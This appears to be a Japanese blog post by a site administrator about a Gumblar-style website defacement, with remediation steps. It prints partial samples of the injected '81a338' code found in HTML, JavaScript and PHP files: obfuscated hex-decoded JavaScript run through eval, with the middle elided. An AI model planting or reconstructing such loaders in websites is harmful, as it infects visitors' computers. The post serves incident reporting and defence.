WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

マルウエア パズル 優先順位 自動 office PPC KMS認証 CS5 ライオンアフィリエイト BBIZ IE 株式会社SRシステム アレックス 大園麗花 アクセスアップ 伊藤 歩 もざ コピーボタン ブラシ 個人情報流出 復元 トレンドアフィリエイト 81a338 ソース 小笠原健一 SyntaxHighlighter 音量アイコン レイアウト崩れ ヤフー 関根塾 加藤 秀吉 html 自己アフィリエイト 人物 ソースコード ブロック 短縮URL せどり やしろ塾 改竄 株式会社バンザイ 定型文 切抜き レタープレス 到達率 シャンプー ランキング ワードプレス デスクトップ プラグイン MovableTYpe 日本語入力変換ソフト IP ヤフーショッピング インターネット モザイク ぼかし LinkShaker 切り抜き WEB エキスパートメール 秒速で1億円稼ぐ男 バナー force puzzle エクスプローラー ヤフオク 加工 賢威 ライン タイガーウイング 池田純矢 自動化 ウインドウ 不正アクセス 画像 アフィ匠 XHTML 不正送信 wpXサーバー JavaScript 登録禁止 管理ツール wp-login.php 不労所得の神 グラデーション 表示 document.all メルマガ配信システム followmatic スカイプ @PAGES 大西良幸 Cash on Wordpress 上位表示 立体 マニュアル ネットビジネス最後の楽園 アフィリエイト CS6 株式会社Free Agent Style アクセス制限 バイドゥー MT ユーチューブマニアクス2017 無断送信 Chrome ツール moza WP 改ざん RSS Includes Pages トラフィック ファビコン Favicon HTML4.0 株式会社WINGOOD 伊藤虎太郎 掲示板 詐欺 SmoothScroll.js 特権ビジネス Google Maps Windows 7 インペリアルゴールド 百度 ボタン 石井匠 SEO functions.php FireWorks Diamond Affiliate Masters Program 固定ページ バイマ 中山秀人 iphone インフォトップ ライブチャット 株式会社ニュース 無料 Yahoo RMT Wordpress Content Slide ハート twitter Newpost Catch プロファイル High Concept Marketing 球体 放射線 エディタ 北川 雅嗣 BUYMA 特定のメールアドレス 村上省吾 ネオヒルズアカデミー 与沢翼×蝶乃舞 インターネットビジネススクール スマホ 副業術 メモ クリックランキング ブラウザ 久積篤史 KMSpico 自己アフィリ トレンドキーワード IBS 情報商材 滑らか クラウド変換 スクロール .htaccess CGI explorer がら空きビジネス ドメイン 株式会社SRシステム tool クラウド入力機能 バックアップ Firefox ネットビジネス大全集 クラック 短縮URLツール フォローマティック ECサイト タスクバー フレンドシップメール 権利収入 宮田麗花 原田真 転売大園塾 大園式転売塾 MasterCollection 関根義光 Tiger-Wing アンダーグラウンドアフィリエイトクラブ 個人情報 背景 管理画面 YouTube Maniax 2017 量産 申請金ビジネス 株式会社A-ブログレス 蝶乃舞 Google Maps API Agency Business Thunderbird アレックス式ネオせどりスクール エクスチェンジ ムーバブルタイプ 与沢翼 postpost ロリポップ ネットガレージ 配布 レビュー system テーマ DOCTYPE Line android SKナレッジ ウイルス サイト改ざん テンプレート レンタルサーバー プロモーション ビジネス 土屋ひろし Internet Explorer Ban Hammer レイアウト 大園転売塾 google 高額塾 ネットゲーム getElementById 山下 ネットショップ ping PHP 新井浩 Youtube 高速ゲーム Windows 伊藤塾 DTD ブルートフォースアタック セキュリティ リンクシェイカー ブロックポリシー インターネットエクスプローラー ツイッター Login LockDown Baidu FTP アイコン 秀吉塾天下統一 ブラクラ やしろひろたみ ping送信 スタイルシート RSS マイクロソフト クロスアフィリエイト 感染 ざくざく君 アンダーグラウンドメソッド 既得権益 ソフト スムーズ Adobe 詐欺組織 出店料 流出 無料オファー css getElementByTagName 三橋美仁 EC ネットビジネス アドセンス Extension Manager 比較 カスタマイズ 伊藤 虎太郎 脆弱性 wordpress サンタ

アーカイブ

エステトラブル

このページの先頭へ